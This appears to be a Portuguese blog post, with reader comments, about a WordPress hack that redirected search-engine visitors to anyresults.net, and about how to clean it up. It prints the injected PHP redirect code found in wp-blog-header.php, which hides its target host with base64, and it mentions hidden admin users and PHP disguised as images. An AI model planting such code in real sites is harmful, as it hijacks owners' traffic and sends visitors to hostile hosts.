Há alguns dias passei por uma situação estranha. Todas as visitas do Blosque, vindas do Google, desapareceram. No entanto, o blog continuava indexado. Nas mesmas posições que antes!
Vários dias de pesquisa foram necessários, para que eu finalmente descobrisse o que estava acontecendo. Fui vítima de um…
Exploit que está atacando muitos blogs do Wordpress.
O que o exploit faz é redirecionar as visitas vindas do Google (e de outras fontes) para o site anyresults.net ou your-needs.info.
Isso é o que causa esse estranho efeito que eu notei: o blog continua indexado, nas mesmas posições, mas não recebe visitas do Google.
Como bem disse o Becher, a impressão que dá é que as pessoas tivessem deixado de usar o Google.
O exploit tem várias formas.
O famoso Donncha descreve várias delas no post Did Your WordPress Site Get Hacked?, junto com as soluções para cada caso.
No meu blog, o exploit foi feito através do arquivo wp-blog-header.php. Este código foi inserido no começo do arquivo:
<?php $seref=array("google","msn","live","altavista",
"ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){
$ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location:
https://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>
Essa é só uma possibilidade.
Os códigos de redirecionamento também podem aparecer em seus arquivos do theme, em arquivos php ou disfarçados como plugins – em alguns casos, é feito o upload de um código php, disfarçado como jpg, à sua pasta de uploads. O código então é inserido na lista de plugins ativos, e aí, babaus visitas.
Para uma lista extensiva (e soluções) dos hacks, visite o post Did Your WordPress Site Get Hacked?. Também há mais informação nos fóruns do Wordpress.
Falha de Segurança no Wordpress 2.5.1?
O pessoal do Wordpress insiste em que o Wordpress 2.5.1 não é afetado pelo exploit – eles dizem que se você usa 2.5.1 e foi afetado, já deveria estar com a intrusão no blog, antes de fazer o upgrade.
Eu tenho lá minhas dúvidas.
Muita gente diz que foi hackeado após o upgrade, e isso é bastante fácil de perceber: no dia em que seu blog é hackeado, suas visitas desaparecem. Duvido muito que o exploit seja uma bomba de tempo, ou que lhe dê um período de “graça” antes de entrar em ação.
Duas últimas coisas, que descobri pesquisando sobre o assunto:
1 – O hack pode criar um user fantasma no seu blog, o que vai lhe permitir voltar a roubar suas visitas, caso você limpe a merda que foi feita.
Eu encontrei um user “Wordpress” na tabela wp-users, que não foi criado por mim e não era visível no painel de controle do Wordpress. Se você foi hackeado, ou desconfia ter sido, não esqueça de dar uma boa olhada nessa tabela, procurando por algum usuário estranho.
2 – Havia um arquivo chamado wp-info.txt na raiz do blog, onde estavam listadas todos os users e passwords do Wordpress e das bases de dados. É claro que esse arquivo deve ser deletado, como parte da limpeza do hack.
Mais informação:
- My Digital Life – WordPress Hack: Recover and Fix Google and Search Engine or No Cookie Traffic Redirected to Illegal Sites
- Digital Point Forums – Same Google Serps, Huge Drop in Traffic
- Digital Point Forums – Hack 302-ing site to anyresults.net
- Digital Point Forums – Wordpress Hack – Hacker redirect SE traffic to his site
- Magpie Brain – WordPress Site Hacked
- Shoemoney – WordPress Redirect h4x’s
- Tiffany Washko – Help for the anyresults.net Hack
- Jammer Six – WordPress Hacked, Search Engine Traffic Stolen by AnyResults.net
- WordPress AnyResults.net Hack – Search Engine Visits Redirecting to AnyResults.net
Allan Brito
Tive um problema parecido, quando estava usando o 2.33, mas desde que migrei para o 2.51 não tive mais problemas.
No meu caso, o hack adicionou um iframe de 1×1 no meu tema, direcionando para um site na China.
Wagner Fontoura
Aconteceu com o Hitech e só saímos do enrosco graças à ajuda de amigos, dentre eles, Tonobohn, Marquinh05, Becher e o bom Rafael, nosso Arcanjo.
🙁
Maysa
Nossa, que coisa!!! Estou impressionada
j. noronha
Por sorte escapei dessa, mas estou sempre de olho e agora atualizo na hora. Não dá mais para ficar rateando.
Nospheratt
Allan: Pois é, eu ainda estou na dúvida quanto à versão que é vulnerável. Tomara que eles tenham razão, e seja só o 2.3 – tomara.
Wagner: Uma bela m*rda, isso. Pelo menos agora parece que os sites saíram do ar – até faz pouco, continuavam funcionando.
Pior ainda, é que MUITa gente deve estar direcionado tráfego pra lá e nem sabe.
Bom, o que seria de nós sem os amigos, né? 🙂
Maysa: Eu proponho castração com serrote enferrujado, para os responsáveis.
Noronha: Rateando. Rateando! Quanto faz que eu não “ouvia” isso. Inda se usa, ou tu (que nem eu) tá ficando velho, mesmo? 😛
José Guimarães
Meu site Wordpress joseguimaraes.com sumiu de vez. Será o mesmo problema?